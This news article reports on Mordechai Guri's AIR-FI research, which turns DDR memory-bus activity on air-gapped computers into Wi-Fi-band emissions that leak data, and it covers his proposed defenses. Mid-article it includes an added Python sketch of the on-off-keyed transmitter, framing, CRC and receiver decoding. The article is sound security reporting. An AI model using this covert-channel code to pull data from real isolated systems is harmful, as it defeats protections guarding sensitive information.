Mordechai Guri, an Israeli cyber security researcher who focuses on covert side channel attacks, has devised yet another way to undermine air gapping – the practice of keeping computers disconnected from any external network for the sake of security.
In a newly released working paper [PDF], “AIR-FI: Generating Covert Wi-Fi Signals from Air-Gapped Computers,” Guri, head of research and development at the Cyber-Security Research Center at Ben-Gurion University of the Negev, Israel, describes a technique for turning DDR SDRAM buses into transmitters that can spew sensitive data.
The technique is envisioned as part of the elaborate attack chain required to compromise highly secure systems that are isolated from public networks.
The first step in this process involves getting malware onto the isolated hardware, either by intercepting the target system and compromising it during the manufacturing or shipping process or by adding malicious code after the hardware has been installed through an infected peripheral like a USB drive.
Without that, the attack goes nowhere. But these sorts of espionage efforts, mainly a concern for organizations operating critical systems and for potential adversaries like spy agencies, have succeeded: As an example, the paper cites the infamous Stuxnet worm, which a decade ago compromised supervisory control and data acquisition (SCADA) systems and damaged something like 1,000 centrifuges at a uranium enrichment facility in Iran. The destructive code, it’s claimed, was introduced to affected systems via a USB thumb drive.
Once a network-disconnected system has been compromised, the question becomes how to exfiltrate data from the machine without anyone noticing. It turns out there are more than a few ways to conduct what’s loosely known as a TEMPEST attack (TEMPEST is a codename for compromising emanations; the expansion “Telecommunications Electronics Materials Protected from Emanating Spurious Transmissions” is an unofficial backronym). The broader family of covert channels the paper surveys carries signals over electromagnetic, acoustic, thermal, optical, or vibrational paths.
Guri’s paper lists various publicly disclosed methods, many of which he helped develop. But AIR-FI is the latest technique he’s devised. It’s a method for sending data via Wi-Fi signals when the target device doesn’t have Wi-Fi capability.
When Wi-Fi isn’t proper Wi-Fi
“The AIR-FI attack introduced in this paper does not require Wi-Fi related hardware in the air-gapped computers,” Guri explains in his paper. “Instead, we show that an attacker can exploit the DDR SDRAM buses to generate electromagnetic emissions in the 2.4 GHz Wi-Fi bands and encode binary data on top of it.”
AIR-FI works by having the malware perform memory transfers that drive the data bus, and the bus in turn radiates an electromagnetic emission. “Since the clock speed of memory modules is typically around the frequency of 2.4 GHz or its harmonics, the memory operations generate electromagnetic emissions around the IEEE 802.11b/g/n Wi-Fi frequency bands,” the paper explains.
For memory modules where that’s not the case, the setup malware would need to overclock or underclock the memory so that its data rate, or one of its harmonics, lands in a Wi-Fi band. This should be possible in software or via BIOS/UEFI configuration. Intel, the paper says, allows the timing parameters of installed memory to be altered using the Extreme Memory Profile (XMP) spec.
From there it’s a matter of modulating the data onto those emissions, transmitting it in packets that include a preamble, payload and error-detecting code, and ensuring the receiving device is listening.
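The transmit-and-frame scheme described above, as an added example that is not code from the paper: the transmitter represents a ‘1’ bit as a bit period full of large memory copies (bus traffic, hence emissions) and a ‘0’ as an idle period, wraps the payload in a preamble, length byte and CRC-8, and the receiver turns one per-bit energy reading into bits, finds the preamble and validates the CRC. The preamble pattern, the CRC-8 polynomial, the bit period and the constructed RSSI samples in `simulate_channel` are all assumptions chosen for illustration, not the paper's parameters.

```python
"""Added illustration of AIR-FI-style on-off keying and framing.
Not the paper's code; every constant below is an assumption."""
import time

PREAMBLE = [1, 0, 1, 0, 1, 0, 1, 0]   # assumed: 8 alternating bits mark a frame start
CRC8_POLY = 0x07                       # assumed: CRC-8 polynomial x^8 + x^2 + x + 1


def crc8(data: bytes) -> int:
    """Bitwise CRC-8, init 0, no reflection; catches any single-bit flip."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ CRC8_POLY) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc


def to_bits(data: bytes) -> list:
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]


def from_bits(bits) -> bytes:
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8))


def build_frame(payload: bytes) -> list:
    """Frame = preamble | length | payload | crc8(length+payload), as a bit list."""
    assert len(payload) < 256, "one-byte length field"
    body = bytes([len(payload)]) + payload
    return PREAMBLE + to_bits(body + bytes([crc8(body)]))


def transmit_frame(bits, bit_period=0.01, chunk=1 << 20) -> int:
    """Transmitter: for a '1', keep the DDR bus busy with copies for one bit
    period; for a '0', stay idle. The radiated side effect is the channel;
    run on its own this only burns time. Returns the number of bits sent."""
    src, dst = bytearray(chunk), bytearray(chunk)
    for bit in bits:
        deadline = time.perf_counter() + bit_period
        if bit:
            while time.perf_counter() < deadline:
                dst[:] = src          # memcpy-sized transfer over the memory bus
        else:
            time.sleep(bit_period)
    return len(bits)


def demodulate(samples, threshold) -> list:
    """Receiver: one energy/RSSI sample per bit period (assumed to come from a
    Wi-Fi chipset in monitor mode) -> bits by simple thresholding (OOK)."""
    return [1 if s > threshold else 0 for s in samples]


def parse_frame(bits):
    """Scan for the preamble, read the length, verify the CRC; payload or None."""
    n = len(PREAMBLE)
    for start in range(len(bits) - n + 1):
        if bits[start:start + n] != PREAMBLE:
            continue
        body_start = start + n
        if body_start + 8 > len(bits):
            continue
        length = from_bits(bits[body_start:body_start + 8])[0]
        end = body_start + 8 * (1 + length + 1)      # length byte + payload + crc byte
        if end > len(bits):
            continue
        body = from_bits(bits[body_start:end - 8])
        if crc8(body) != from_bits(bits[end - 8:end])[0]:
            continue                                  # corrupted; keep scanning
        return body[1:]
    return None


def simulate_channel(bits, noise_db=0.3) -> list:
    """Constructed RSSI samples in dBm: '1' periods carry ~20 dB extra energy
    in the 2.4 GHz band, with a little deterministic jitter standing in for noise."""
    return [-60.0 + (20.0 if b else 0.0) + noise_db * ((i * 7) % 3 - 1)
            for i, b in enumerate(bits)]


if __name__ == "__main__":
    frame = build_frame(b"secret")
    print(parse_frame(demodulate(simulate_channel(frame), threshold=-50.0)))
```

The CRC is what makes the low, noisy bit rate usable: a receiver that mis-thresholds a single sample discards the frame rather than delivering garbage, and the transmitter simply repeats it.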
Guri’s experimental setup demonstrated that such signals can be picked up within several meters of the air-gapped machine, though the rate of transmission is rather low: 1 to 100 bits per second. You can see it in action below.
The technique doesn’t require any special privileges, since ordinary user-mode memory operations drive the bus, and it works from within a virtual machine. It does require a nearby Wi-Fi capable receiving device, but those turn out to be fairly common in office or industrial environments – any suitably prepared mobile phone, computer, or IoT device would do.
Guri suggests various potential defenses, such as not allowing network-capable devices near air-gapped hardware, implementing Wi-Fi jamming, muddying any potential covert Wi-Fi signal with a background process running random memory/CPU operations, and Faraday shielding.
But the best protection against this technique is probably that network-based attacks are so much easier. When US government agencies install subverted Orion network monitoring software from SolarWinds, giving hackers the keys to the kingdom, it’s clear there’s a lot of low-hanging fruit to be had without the bother of building a bridge to an air-gapped machine. ®